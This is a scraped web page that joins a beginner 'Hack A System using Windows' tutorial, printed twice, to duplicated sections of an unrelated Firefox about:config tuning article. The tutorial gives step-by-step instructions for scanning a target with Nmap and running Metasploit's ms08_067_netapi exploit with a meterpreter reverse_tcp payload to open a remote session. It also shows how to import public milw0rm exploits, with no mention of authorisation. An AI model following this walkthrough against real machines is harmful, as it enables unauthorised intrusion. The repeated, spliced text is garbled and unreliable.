Hack A System using Windows:

Hack A System using Windows:

Hack A System using Windows:
–
Finding Your Target: (IP)
__
Test this on a friends computer so you can understand
how it works.
Your Friend: Clicks START MENU then RUN then types
ipconfig.
If this does not work, they can also do this by clicking
the START MENU, then PROGRAMS then ACCESSORIES then
clicking COMMAND PROMPT. Type ipconfig and press enter.
Where it says “Ipv4 Address” there are four sets of
numbers. This is your friends IP ADDRESS.
Write it down, and keep it for later in this tutorial.
Or you can brouse this furum on other ways to get an ip
For exaple: IPget (MSN Plugin)
Scanning for an Open Port
__
Download and Install Nmap:
First, you will need to download Nmap.
Nmap is FREE and available here: http://www.insecure.org
Get the correct version for your operating system.
(Latest Stable Release, Self-Installer)
–
Run Zenmap
(The GUI *non black and white screen* version)
In the “Target” field, type your friend’s IP ADDRESS.
Once it is entered, click SCAN.
Allow the scan to complete, and save the information
Nmap found about your friend’s open ports for later
on in the tutorial.
Explanation
__
Your computer and your friends computer had a convorsation:
Your Computer Said: Can I Come In?
Your Friends Computer Replied: Maybe.
Your Computer Said: Where’s your front door?
Your Friends Computer Replied: Here’s a map of my doors,
windows, and chimney.
Now you are taking this map, and finding out how to open
his doors, windows, and chimney.
–
Downloading Hack Tools:
__
In this part, you will need two items.
VMWare Player (Program)
http://downloads.vmware.com/d/info/deskt…player/3_0
Scroll Down to “Product Downloads” then “Product” then click “VMWare Player 3.0.1″
Find the one for your operating system. Download.. and Install.
Linux Backtrack 4 Vmware Image (OS)
Download Link: http://www.backtrack-linux.org/bt4-final-vm.zip.torrent
Linux Backtrack 4 can be downloaded with uTorrent (http://www.utorrent.com)
When Linux Backtrack 4 is done downloading, open it.
(If it won’t open, try downloading and installing WinRAR first)
*WinRAR is found at http://www.rarsoft.com*
You will select BT4-Beta, click EXTRACT, and put them in your VMWare
Folder called “Virtual Machines.”
Setting Up Tools:
__
Open VMWare Player, and click “OPEN.”
Find your “Virtual Machines” Folder, and go into BT4-Beta.
Double Click BT4-Beta.vmx
Allow it to Boot up (load files).
When it says “bt login” type root (then press enter)
When it says “password” type toor (then press enter)
It will say “root@bt:~#” type startx (then press enter)
To EXIT, click the “Computer Monitor Icon” at the bottom left corner,
and type poweroff (then press enter)
Explanation:
__
At this point, you have access to many hacking tools.
The Linux Backtrack OS has TONS of tools to use.
If you want to learn about them, just visit their forum
at remote-exploit.org
–
In Backtrack:
__
Click the “Computer Monitor Icon” at the bottom left corner.
In the box, type /etc/init.d/networking start (then press enter)
This allows Backtrack Networking. You need it “on” to hack.
When it is done loading, type ifconfig (then press enter)
If you have an IP address where it says “inet addr” then it
is worked. If not, check out their forum to troubleshoot.
Metasploit Attack Method:
__
In the “Computer Monitor Icon Box” you opened, type
cd /pentest/exploits/framework3 (then press enter)
*If it is a different version of Metasploit, you might use a different command*
*If so, visit the remote-exploit.org forum and look around*
Type ls (then press enter)
Type ./msfconsole (then press enter)
You will see a “metasploit logo” and where it used to say “root@bt:”
now says “msf >”
Type show exploits (then press enter)
This is a list of all of the different attacks you can use with Metasploit.
–
Exploit meets Vulnerability
__
Do you remember when your friends computer told you how to get inside? (The Nmap
report) Get your map and look at it closely.
You want to match the name of “one way in” to something
listed on the “different attack list” that Metasploit gave you.
Suppose you see “ms08_067_netapi” on both, then this is what you want to use.
(We are using ms08_067_netapi as an example)
Type: use (copy and paste exploit name)
So it will look like this: use windows/smb/ms08_067_netapi (then press enter)
Now type show options (then press enter)
Type set RHOST (Friends IP Address)
If your friends IP Address is 44.44.444.444, it will look like this
set RHOST 44.44.444.444 (then press enter)
Type set payload windows/meterpreter/reverse_tcp (press enter)
*Payloads are “what happens when their computer is exploited”
*There are other things you can choose from, but learn about those later on.
Type show options (then press enter)
Now, you will find your own IP Address. (Do this by clicking your START MENU, and
choosing PROGRAMS, ACCESSORIES, then COMMAND PROMPT) in the box type ipconfig
(then press enter)
As an example, we will say your IP Address is 55.55.555.555
Type set LHOST 55.55.555.555
Ready? Set? Type exploit (then press enter)
As an example, we used 44.44.444.444 for your friends IP Address, and
55.55.555.555 as your IP Address. So, if it says
“Meterpreter Session 1 opened (44.44.444.444 -> 55.55.555.555)” you
succeeded.
–
NEW Exploits and Attacks:
__
Hackers around the world find new ways to “get inside” computers every single day.
Metasploit has lots of attacks, but how can you use a NEW exploit?
The NEWEST exploits can be found two ways.
#1. You know how to take a REAL program (like Mozilla Firefox, etc) and find weaknesses in it.
You find an exploit that has not been discovered yet.
#2. Your best friend finds one and lets you have it (incredibly unlikely)
If you do not have either of these resources, you must depend on “public” exploits.
Some hackers search for weaknesses in programs and report them right away to websites.
Let’s say “Hacker” found a weakness in Firefox. Mozilla will make a “fix” for it, but
the people that have not updated Firefox with the “fix” are still vulnerable.
Beginners usually watch websites like http://www.milw0rm.com (and others) for these “NEW” exploits,
and try to test them against computers that have not been updated yet to gain access.
The question is.. how can you take a vulnerability from a public exploit website like milw0rm.com
and use it with Metasploit?
On the website (milw0rm.com) you will see a “D” column next to every exploit. This allows you to
DOWNLOAD the exploit. Once you have it, you will need to learn a small bit of programming to change
it to an .rb
__
Adding An Exploit File (.rb) to Metasploit:
__
Follow instructions above to start Linux Backtrack 4. Click the “Computer Monitor Icon” at the
bottom left of your screen. In the window, type cd /pentest/exploits/framework3 (then press enter)
Type ls (then press enter)
Type cd lib (then press enter)
Type cd msf (then press enter)
Type cd core (then press enter)
Type cd exploit (then press enter)
Type ls (then press enter)
At this point, we are going to use the “mv” command to move fileformat.rb
Try using mv /home/root/Desktop/fileformat.rb /home/root/pentest/framework3/lib/msf/core/exploit/
(then press enter)
*Might be a different directory, refer to remote-exploit.org forum if it does not work*
There will be a list of files after you press ENTER. Make sure fileformat.rb is there.
Type clear (then press enter)
Type cd .. (then press enter)
At this point, we are going to edit “exploit.rb”
Type nano exploit.rb (then press enter) then hold the DOWN arrow key to the area where it says
# Networks.
Hit the DOWN key a couple more times until you are below all of the “require” lines. Press ENTER.
Type # Fileformat (so it is even with #Networks)
Under it, type require ‘msf/core/exploit/fileformat’ and SAVE IT.
Now we have to move all of the new exploits (in .rb format) into “modules”
Go back to where Metasploit was being used “Computer Monitor Icon”
Type cd ../../../ (then press enter)
Type cd modules (then press enter)
Type ls (then press enter)
Type cd exploits (then press enter)
cd windows (then press enter)
Type mkdir fileformat (then press enter)
Type cd fileformat (then press enter)
Now we’re going to use the GUI (the non-black and white box way)
Open the equivelant of Windows’ “My Computer”
Double click: PENTEST then FRAMEWORK3 then MODULES then EXPLOITS then WINDOWS then FILEFORMAT
Drag all of your .rb format exploits into the folder.
__
Exploit File (.rb) TEST:
__
Go back to Metasploit, and type sudo rm -rf .msf3 (then press enter)
Now close it.
Open the “Computer Monitor Icon” at the bottom left of your screen, and get back into Metasploit.
You should have a higher number of exploits!
Enjoy!

Hack A System using Windows:
–
Finding Your Target: (IP)
__
Test this on a friends computer so you can understand
how it works.
Your Friend: Clicks START MENU then RUN then types
ipconfig.
If this does not work, they can also do this by clicking
the START MENU, then PROGRAMS then ACCESSORIES then
clicking COMMAND PROMPT. Type ipconfig and press enter.
Where it says “Ipv4 Address” there are four sets of
numbers. This is your friends IP ADDRESS.
Write it down, and keep it for later in this tutorial.
Or you can brouse this furum on other ways to get an ip
For exaple: IPget (MSN Plugin)
Scanning for an Open Port
__
Download and Install Nmap:
First, you will need to download Nmap.
Nmap is FREE and available here: http://www.insecure.org
Get the correct version for your operating system.
(Latest Stable Release, Self-Installer)
–
Run Zenmap
(The GUI *non black and white screen* version)
In the “Target” field, type your friend’s IP ADDRESS.
Once it is entered, click SCAN.
Allow the scan to complete, and save the information
Nmap found about your friend’s open ports for later
on in the tutorial.
Explanation
__
Your computer and your friends computer had a convorsation:
Your Computer Said: Can I Come In?
Your Friends Computer Replied: Maybe.
Your Computer Said: Where’s your front door?
Your Friends Computer Replied: Here’s a map of my doors,
windows, and chimney.
Now you are taking this map, and finding out how to open
his doors, windows, and chimney.
–
Downloading Hack Tools:
__
In this part, you will need two items.
VMWare Player (Program)
http://downloads.vmware.com/d/info/deskt…player/3_0
Scroll Down to “Product Downloads” then “Product” then click “VMWare Player 3.0.1″
Find the one for your operating system. Download.. and Install.
Linux Backtrack 4 Vmware Image (OS)
Download Link: http://www.backtrack-linux.org/bt4-final-vm.zip.torrent
Linux Backtrack 4 can be downloaded with uTorrent (http://www.utorrent.com)
When Linux Backtrack 4 is done downloading, open it.
(If it won’t open, try downloading and installing WinRAR first)
*WinRAR is found at http://www.rarsoft.com*
You will select BT4-Beta, click EXTRACT, and put them in your VMWare
Folder called “Virtual Machines.”
Setting Up Tools:
__
Open VMWare Player, and click “OPEN.”
Find your “Virtual Machines” Folder, and go into BT4-Beta.
Double Click BT4-Beta.vmx
Allow it to Boot up (load files).
When it says “bt login” type root (then press enter)
When it says “password” type toor (then press enter)
It will say “root@bt:~#” type startx (then press enter)
To EXIT, click the “Computer Monitor Icon” at the bottom left corner,
and type poweroff (then press enter)
Explanation:
__
At this point, you have access to many hacking tools.
The Linux Backtrack OS has TONS of tools to use.
If you want to learn about them, just visit their forum
at remote-exploit.org
–
In Backtrack:
__
Click the “Computer Monitor Icon” at the bottom left corner.
In the box, type /etc/init.d/networking start (then press enter)
This allows Backtrack Networking. You need it “on” to hack.
When it is done loading, type ifconfig (then press enter)
If you have an IP address where it says “inet addr” then it
is worked. If not, check out their forum to troubleshoot.
Metasploit Attack Method:
__
In the “Computer Monitor Icon Box” you opened, type
cd /pentest/exploits/framework3 (then press enter)
*If it is a different version of Metasploit, you might use a different command*
*If so, visit the remote-exploit.org forum and look around*
Type ls (then press enter)
Type ./msfconsole (then press enter)
You will see a “metasploit logo” and where it used to say “root@bt:”
now says “msf >”
Type show exploits (then press enter)
This is a list of all of the different attacks you can use with Metasploit.
–
Exploit meets Vulnerability
__
Do you remember when your friends computer told you how to get inside? (The Nmap
report) Get your map and look at it closely.
You want to match the name of “one way in” to something
listed on the “different attack list” that Metasploit gave you.
Suppose you see “ms08_067_netapi” on both, then this is what you want to use.
(We are using ms08_067_netapi as an example)
Type: use (copy and paste exploit name)
So it will look like this: use windows/smb/ms08_067_netapi (then press enter)
Now type show options (then press enter)
Type set RHOST (Friends IP Address)
If your friends IP Address is 44.44.444.444, it will look like this
set RHOST 44.44.444.444 (then press enter)
Type set payload windows/meterpreter/reverse_tcp (press enter)
*Payloads are “what happens when their computer is exploited”
*There are other things you can choose from, but learn about those later on.
Type show options (then press enter)
Now, you will find your own IP Address. (Do this by clicking your START MENU, and
choosing PROGRAMS, ACCESSORIES, then COMMAND PROMPT) in the box type ipconfig
(then press enter)
As an example, we will say your IP Address is 55.55.555.555
Type set LHOST 55.55.555.555
Ready? Set? Type exploit (then press enter)
As an example, we used 44.44.444.444 for your friends IP Address, and
55.55.555.555 as your IP Address. So, if it says
“Meterpreter Session 1 opened (44.44.444.444 -> 55.55.555.555)” you
succeeded.
–
NEW Exploits and Attacks:
__
Hackers around the world find new ways to “get inside” computers every single day.
Metasploit has lots of attacks, but how can you use a NEW exploit?
The NEWEST exploits can be found two ways.
#1. You know how to take a REAL program (like Mozilla Firefox, etc) and find weaknesses in it.
You find an exploit that has not been discovered yet.
#2. Your best friend finds one and lets you have it (incredibly unlikely)
If you do not have either of these resources, you must depend on “public” exploits.
Some hackers search for weaknesses in programs and report them right away to websites.
Let’s say “Hacker” found a weakness in Firefox. Mozilla will make a “fix” for it, but
the people that have not updated Firefox with the “fix” are still vulnerable.
Beginners usually watch websites like http://www.milw0rm.com (and others) for these “NEW” exploits,
and try to test them against computers that have not been updated yet to gain access.
The question is.. how can you take a vulnerability from a public exploit website like milw0rm.com
and use it with Metasploit?
On the website (milw0rm.com) you will see a “D” column next to every exploit. This allows you to
DOWNLOAD the exploit. Once you have it, you will need to learn a small bit of programming to change
it to an .rb
__
Adding An Exploit File (.rb) to Metasploit:
__
Follow instructions above to start Linux Backtrack 4. Click the “Computer Monitor Icon” at the
bottom left of your screen. In the window, type cd /pentest/exploits/framework3 (then press enter)
Type ls (then press enter)
Type cd lib (then press enter)
Type cd msf (then press enter)
Type cd core (then press enter)
Type cd exploit (then press enter)
Type ls (then press enter)
At this point, we are going to use the “mv” command to move fileformat.rb
Try using mv /home/root/Desktop/fileformat.rb /home/root/pentest/framework3/lib/msf/core/exploit/
(then press enter)
*Might be a different directory, refer to remote-exploit.org forum if it does not work*
There will be a list of files after you press ENTER. Make sure fileformat.rb is there.
Type clear (then press enter)
Type cd .. (then press enter)
At this point, we are going to edit “exploit.rb”
Type nano exploit.rb (then press enter) then hold the DOWN arrow key to the area where it says
# Networks.
Hit the DOWN key a couple more times until you are below all of the “require” lines. Press ENTER.
Type # Fileformat (so it is even with #Networks)
Under it, type require ‘msf/core/exploit/fileformat’ and SAVE IT.
Now we have to move all of the new exploits (in .rb format) into “modules”
Go back to where Metasploit was being used “Computer Monitor Icon”
Type cd ../../../ (then press enter)
Type cd modules (then press enter)
Type ls (then press enter)
Type cd exploits (then press enter)
cd windows (then press enter)
Type mkdir fileformat (then press enter)
Type cd fileformat (then press enter)
Now we’re going to use the GUI (the non-black and white box way)
Open the equivelant of Windows’ “My Computer”
Double click: PENTEST then FRAMEWORK3 then MODULES then EXPLOITS then WINDOWS then FILEFORMAT
Drag all of your .rb format exploits into the folder.
__
Exploit File (.rb) TEST:
__
Go back to Metasploit, and type sudo rm -rf .msf3 (then press enter)
Now close it.
Open the “Computer Monitor Icon” at the bottom left of your screen, and get back into Metasploit.
You should have a higher number of exploits!
Enjoy!

Make the user interface behave

Make the user interface behave

Make the user interface behave

Another big reason people hack Firefox's settings is to modify the user interface -- either to make it a little easier to do something, or to revert to a behavior that was prevalent in Version 1.x but changed in 2.0.
Get case-sensitive, in-page searches
The integer preference accessibility.typeaheadfind.casesensitive controls how Firefox's "Find as You Type" feature behaves. The default is 0 for case-insensitive searches; set it to 1 for case-sensitive matching.
Control address bar searches
You may have noticed that if you type something into Firefox's address bar that's not an address (a "keyword"), Firefox typically passes it on to Google as an "I'm Feeling Lucky" search term. The exact search engine string to use is defined in the string preference keyword.URL; if you want to change it to something else, you can simply edit this string.
For instance, to make Microsoft's Live.com the default keyword search, set this string to
http://search.live.com/results.aspx?q=
For a Yahoo search, it would be
http://search.yahoo.com/search?p=
If you want to restore the default search, use
http://www.google.com/search?ie=UTF-8&oe=
UTF-8&sourceid=navclient&gfns=1&q=
Finally, if you want to turn this address-bar keyword functionality off altogether, set the Boolean preference keyword.enabled to false.
Note that with Google, the more generic the keyword, the less likely it is to be used as an "I'm Feeling Lucky" search -- although what constitutes "generic" isn't always clear. For instance, typing "clean" into the address bar returns a generic Google search page, but "sideways" takes me to the Internet Movie Database entry for the movie of that name (the "I'm Feeling Lucky" result). Your mileage will almost certainly vary.
Select just a word
The Boolean preference layout.word_select.eat_space_to_next_word governs one of Firefox's tiny, but for me incredibly annoying, little behaviors. When you double-click on a word in a Web page to select it, Firefox automatically includes the space after the word. Most of the time I don't want that; I just want the selection to stop at the end of the word. Setting this to false will defeat that behavior.
Select a word and its punctuation
Somewhat contrarily, if you double-click a word that's next to any kind of punctuation mark, Firefox defaults to selecting only the word itself, not its adjacent punctuation. Set the Boolean preference layout.word_select.stop_at_punctuation to false to select the word and its adjacent punctuation.
Get Alt-hotkey shortcuts back
One minor change in Firefox 2 was the way in which form elements on a Web page had hotkey bindings assigned to them. In Firefox 1.x, when a Web page assigned a hotkey to a form element, you pressed Alt-hotkey to access it. In Version 2.x, this was changed to Alt-Shift-hotkey. To revert to the original 1.x behavior, set the integer preference ui.key.contentAccess to 4. This is useful if you have, for instance, a Web-based interface you spend a lot of time in, and use Alt-key bindings to do things quickly in that particular page.

Hacking Firefox The secrets of about:config Before you begin Speed up page display Have tabbed browsing your way Make the user interface behave Hack network connections Stop memory hogging

Note that one possible consequence of setting this back to the old behavior is that Alt-key bindings on a Web page can now override the default key sequences for the program itself (such as Alt-S for History), but you can always get around this by tapping Alt to activate the menu and then tapping the program hotkey in question. Change scrollbar behavior
By default, clicking in the empty areas of the Firefox window's scrollbar will simply cause the view to move up or down one page. You can change this behavior by creating a Boolean preference called ui.scrollToClick and setting its value to true. Now clicking in a scrollbar will cause the view to jump directly to that point in the page (basically the same as dragging the scrollbar to that position).
Get click-and-hold context menus back (for Macs only)
If you want to restore the classic click-and-hold context-menu behavior on the Macintosh, edit or create the Boolean preference ui.click_hold_context_menus and set it to true.

Make the user interface behave

Another big reason people hack Firefox's settings is to modify the user interface -- either to make it a little easier to do something, or to revert to a behavior that was prevalent in Version 1.x but changed in 2.0.
Get case-sensitive, in-page searches
The integer preference accessibility.typeaheadfind.casesensitive controls how Firefox's "Find as You Type" feature behaves. The default is 0 for case-insensitive searches; set it to 1 for case-sensitive matching.
Control address bar searches
You may have noticed that if you type something into Firefox's address bar that's not an address (a "keyword"), Firefox typically passes it on to Google as an "I'm Feeling Lucky" search term. The exact search engine string to use is defined in the string preference keyword.URL; if you want to change it to something else, you can simply edit this string.
For instance, to make Microsoft's Live.com the default keyword search, set this string to
http://search.live.com/results.aspx?q=
For a Yahoo search, it would be
http://search.yahoo.com/search?p=
If you want to restore the default search, use
http://www.google.com/search?ie=UTF-8&oe=
UTF-8&sourceid=navclient&gfns=1&q=
Finally, if you want to turn this address-bar keyword functionality off altogether, set the Boolean preference keyword.enabled to false.
Note that with Google, the more generic the keyword, the less likely it is to be used as an "I'm Feeling Lucky" search -- although what constitutes "generic" isn't always clear. For instance, typing "clean" into the address bar returns a generic Google search page, but "sideways" takes me to the Internet Movie Database entry for the movie of that name (the "I'm Feeling Lucky" result). Your mileage will almost certainly vary.
Select just a word
The Boolean preference layout.word_select.eat_space_to_next_word governs one of Firefox's tiny, but for me incredibly annoying, little behaviors. When you double-click on a word in a Web page to select it, Firefox automatically includes the space after the word. Most of the time I don't want that; I just want the selection to stop at the end of the word. Setting this to false will defeat that behavior.
Select a word and its punctuation
Somewhat contrarily, if you double-click a word that's next to any kind of punctuation mark, Firefox defaults to selecting only the word itself, not its adjacent punctuation. Set the Boolean preference layout.word_select.stop_at_punctuation to false to select the word and its adjacent punctuation.
Get Alt-hotkey shortcuts back
One minor change in Firefox 2 was the way in which form elements on a Web page had hotkey bindings assigned to them. In Firefox 1.x, when a Web page assigned a hotkey to a form element, you pressed Alt-hotkey to access it. In Version 2.x, this was changed to Alt-Shift-hotkey. To revert to the original 1.x behavior, set the integer preference ui.key.contentAccess to 4. This is useful if you have, for instance, a Web-based interface you spend a lot of time in, and use Alt-key bindings to do things quickly in that particular page.

Hacking Firefox The secrets of about:config Before you begin Speed up page display Have tabbed browsing your way Make the user interface behave Hack network connections Stop memory hogging

Note that one possible consequence of setting this back to the old behavior is that Alt-key bindings on a Web page can now override the default key sequences for the program itself (such as Alt-S for History), but you can always get around this by tapping Alt to activate the menu and then tapping the program hotkey in question. Change scrollbar behavior
By default, clicking in the empty areas of the Firefox window's scrollbar will simply cause the view to move up or down one page. You can change this behavior by creating a Boolean preference called ui.scrollToClick and setting its value to true. Now clicking in a scrollbar will cause the view to jump directly to that point in the page (basically the same as dragging the scrollbar to that position).
Get click-and-hold context menus back (for Macs only)
If you want to restore the classic click-and-hold context-menu behavior on the Macintosh, edit or create the Boolean preference ui.click_hold_context_menus and set it to true.

Have tabbed browsing your way

Right from the start, one of Firefox's strengths has been tabbed browsing. But if the tabs don't behave quite the way you want them to by default, or you hate the way the default behaviors have changed since Firefox 1.x, the following changes will bring them in line.
Corral close buttons
The integer preference browser.tabs.closeButtons controls how the close buttons (the "X" icons) are rendered on tabs:

0: Display a close button only on the currently active tab. This is a nice way to keep from accidentally smacking into a close button for the wrong tab.
(You can press Ctrl-F4 to close only the current tab, but many mouse-centric people never bother to do this.)
1: Display close buttons on all tabs (default).
2: Don't display any close buttons; the only way to close a tab is by pressing Ctrl-F4.
3: Display one close button at the end of the tab bar (Firefox 1.x's default).

A close button on just one tab. (Click for larger view.)

Open search results in a new tab
This one is a favorite of mine. When browser.search.openintab (a Boolean preference) is set to true, any searches launched from the Search tool bar are opened in a new tab instead of overwriting the contents of the current one. I can't tell you the number of times I mistakenly wiped out my current page before I started using this.
Note that if you launch a new browser window with Ctrl-N and perform a search there, you'll see the search results and the default home page for the new browser instance loading in separate tabs.

Hacking Firefox The secrets of about:config Before you begin Speed up page display Have tabbed browsing your way Make the user interface behave Hack network connections Stop memory hogging

Open bookmark groups in new tabs
If you open a group of bookmarks at once, Firefox's default behavior is to replace any existing tabs with the newly opened pages. Set browser.tabs.loadFolderAndReplace (Boolean) to false, and opening groups of bookmarks will append new tabs to the existing window instead of overwriting existing ones.
Squeeze more tabs into the tab bar
The integer preference browser.tabs.tabMinWidth controls how narrow, in pixels, tabs can be shrunk down before scroll arrows appear on the left and right edges of the tab bar.
The default is 100, but you can set this to something smaller so you can fit more tabs in the bar at once. Note, however, that you might find the shortened titles harder to read.

The tab bar before and after reducing the minimum tab width. (Click for larger view.)

In the same vein, the integer preference browser.tabs.tabClipWidth sets the minimum width, in pixels, that a tab must be in order to show a close button. This is 140 by default, so if you set this to something lower, you'll see more tabs with close buttons when the tab bar is heavily populated.

Have tabbed browsing your way

Right from the start, one of Firefox's strengths has been tabbed browsing. But if the tabs don't behave quite the way you want them to by default, or you hate the way the default behaviors have changed since Firefox 1.x, the following changes will bring them in line.
Corral close buttons
The integer preference browser.tabs.closeButtons controls how the close buttons (the "X" icons) are rendered on tabs:

0: Display a close button only on the currently active tab. This is a nice way to keep from accidentally smacking into a close button for the wrong tab.
(You can press Ctrl-F4 to close only the current tab, but many mouse-centric people never bother to do this.)
1: Display close buttons on all tabs (default).
2: Don't display any close buttons; the only way to close a tab is by pressing Ctrl-F4.
3: Display one close button at the end of the tab bar (Firefox 1.x's default).

A close button on just one tab. (Click for larger view.)

Open search results in a new tab
This one is a favorite of mine. When browser.search.openintab (a Boolean preference) is set to true, any searches launched from the Search tool bar are opened in a new tab instead of overwriting the contents of the current one. I can't tell you the number of times I mistakenly wiped out my current page before I started using this.
Note that if you launch a new browser window with Ctrl-N and perform a search there, you'll see the search results and the default home page for the new browser instance loading in separate tabs.

Hacking Firefox The secrets of about:config Before you begin Speed up page display Have tabbed browsing your way Make the user interface behave Hack network connections Stop memory hogging

Open bookmark groups in new tabs
If you open a group of bookmarks at once, Firefox's default behavior is to replace any existing tabs with the newly opened pages. Set browser.tabs.loadFolderAndReplace (Boolean) to false, and opening groups of bookmarks will append new tabs to the existing window instead of overwriting existing ones.
Squeeze more tabs into the tab bar
The integer preference browser.tabs.tabMinWidth controls how narrow, in pixels, tabs can be shrunk down before scroll arrows appear on the left and right edges of the tab bar.
The default is 100, but you can set this to something smaller so you can fit more tabs in the bar at once. Note, however, that you might find the shortened titles harder to read.

The tab bar before and after reducing the minimum tab width. (Click for larger view.)

In the same vein, the integer preference browser.tabs.tabClipWidth sets the minimum width, in pixels, that a tab must be in order to show a close button. This is 140 by default, so if you set this to something lower, you'll see more tabs with close buttons when the tab bar is heavily populated.

Speed up page display

Speed up page display

Speed up page display

Some of the more recent Firefox customizations I've examined are ways to speed up the rendering of Web pages. The settings to do this are a little arcane and not terribly self-explanatory, but with a little tinkering, you can often get pages to pop up faster and waste less time redrawing themselves.
Start rendering pages faster
Creating an nglayout.initialpaint.delay integer preference lets you control how long Firefox waits before starting to render a page. If this value isn't set, Firefox defaults to 250 milliseconds, or 0.25 of a second. Some people report that setting it to 0 -- i.e., forcing Firefox to begin rendering immediately -- causes almost all pages to show up faster. Values as high as 50 are also pretty snappy.
Reduce the number of reflows
When Firefox is actively loading a page, it periodically reformats or "reflows" the page as it loads, based on what data has been received. Create a content.notify.interval integer preference to control the minimum number of microseconds (millionths of a second) that elapse between reflows. If it's not explicitly set, it defaults to 120000 (0.12 of a second).
Too many reflows may make the browser feel sluggish, so you can increase the interval between reflows by raising this to 500000 (500,000, or 1/2 second) or even to 1000000 (1 million, or 1 second). If you set this value, be sure to also create a Boolean value called content.notify.ontimer and set it to true.

A page "reflowing" while loading in Firefox.

Control Firefox's 'unresponsive' time
When rendering a page, Firefox periodically runs a little faster internally to speed up the rendering process (a method Mozilla calls "tokenizing"), but at the expense of being unresponsive to user input for that length of time. If you want to set the maximum length of time any one of these unresponsive periods can be, create an integer preference called content.max.tokenizing.time.
Set this to a multiple of content.notify.interval's value, or even the same value (but higher is probably better). If you set this to something lower than content.notify.interval, the browser may respond more often to user input while pages are being rendered, but the page itself will render that much more slowly.
If you set a value for content.max.tokenizing.time, you also need to create two more Boolean values -- content.notify.ontimer and content.interrupt.parsing -- and set them both to true.
Control Firefox's 'highly responsive' time
If Firefox is rendering a page and the user performs some kind of command, like scrolling through a still-loading page, Firefox will remain more responsive to user input for a period of time. To control how long this interval is, create an integer preference called content.switch.threshold.

Hacking Firefox The secrets of about:config Before you begin Speed up page display Have tabbed browsing your way Make the user interface behave Hack network connections Stop memory hogging

This is normally triple the value of content.notify.interval, but I typically set it to be the same as that value. Set it to something very low -- say, 10000 (10,000 microseconds) -- and the browser may not respond as snappily, but it may cause the rendering to complete more quickly. If you haven't already created the Boolean values content.notify.ontimer and content.interrupt.parsing and set them both to true in conjunction with content.max.tokenizing.time, you'll need to do so to make content.switch.threshold work properly.
If you are more inclined to wait for a page to finish loading before attempting to do anything with it (like scroll through it), you can set content.max.tokenizing.time to a higher value and content.switch.threshold to a lower value to allow Firefox to finish rendering a page faster at the expense of processing user commands. On the other hand, if you're the kind of person who likes to scroll through a page and start reading it before it's done loading, you can set content.max.tokenizing.time to a lower value and content.switch.threshold to a higher one, to give you back that much more responsiveness at the cost of page-rendering speed.

Speed up page display

Some of the more recent Firefox customizations I've examined are ways to speed up the rendering of Web pages. The settings to do this are a little arcane and not terribly self-explanatory, but with a little tinkering, you can often get pages to pop up faster and waste less time redrawing themselves.
Start rendering pages faster
Creating an nglayout.initialpaint.delay integer preference lets you control how long Firefox waits before starting to render a page. If this value isn't set, Firefox defaults to 250 milliseconds, or 0.25 of a second. Some people report that setting it to 0 -- i.e., forcing Firefox to begin rendering immediately -- causes almost all pages to show up faster. Values as high as 50 are also pretty snappy.
Reduce the number of reflows
When Firefox is actively loading a page, it periodically reformats or "reflows" the page as it loads, based on what data has been received. Create a content.notify.interval integer preference to control the minimum number of microseconds (millionths of a second) that elapse between reflows. If it's not explicitly set, it defaults to 120000 (0.12 of a second).
Too many reflows may make the browser feel sluggish, so you can increase the interval between reflows by raising this to 500000 (500,000, or 1/2 second) or even to 1000000 (1 million, or 1 second). If you set this value, be sure to also create a Boolean value called content.notify.ontimer and set it to true.

A page "reflowing" while loading in Firefox.

Control Firefox's 'unresponsive' time
When rendering a page, Firefox periodically runs a little faster internally to speed up the rendering process (a method Mozilla calls "tokenizing"), but at the expense of being unresponsive to user input for that length of time. If you want to set the maximum length of time any one of these unresponsive periods can be, create an integer preference called content.max.tokenizing.time.
Set this to a multiple of content.notify.interval's value, or even the same value (but higher is probably better). If you set this to something lower than content.notify.interval, the browser may respond more often to user input while pages are being rendered, but the page itself will render that much more slowly.
If you set a value for content.max.tokenizing.time, you also need to create two more Boolean values -- content.notify.ontimer and content.interrupt.parsing -- and set them both to true.
Control Firefox's 'highly responsive' time
If Firefox is rendering a page and the user performs some kind of command, like scrolling through a still-loading page, Firefox will remain more responsive to user input for a period of time. To control how long this interval is, create an integer preference called content.switch.threshold.

Hacking Firefox The secrets of about:config Before you begin Speed up page display Have tabbed browsing your way Make the user interface behave Hack network connections Stop memory hogging

This is normally triple the value of content.notify.interval, but I typically set it to be the same as that value. Set it to something very low -- say, 10000 (10,000 microseconds) -- and the browser may not respond as snappily, but it may cause the rendering to complete more quickly. If you haven't already created the Boolean values content.notify.ontimer and content.interrupt.parsing and set them both to true in conjunction with content.max.tokenizing.time, you'll need to do so to make content.switch.threshold work properly.
If you are more inclined to wait for a page to finish loading before attempting to do anything with it (like scroll through it), you can set content.max.tokenizing.time to a higher value and content.switch.threshold to a lower value to allow Firefox to finish rendering a page faster at the expense of processing user commands. On the other hand, if you're the kind of person who likes to scroll through a page and start reading it before it's done loading, you can set content.max.tokenizing.time to a lower value and content.switch.threshold to a higher one, to give you back that much more responsiveness at the cost of page-rendering speed.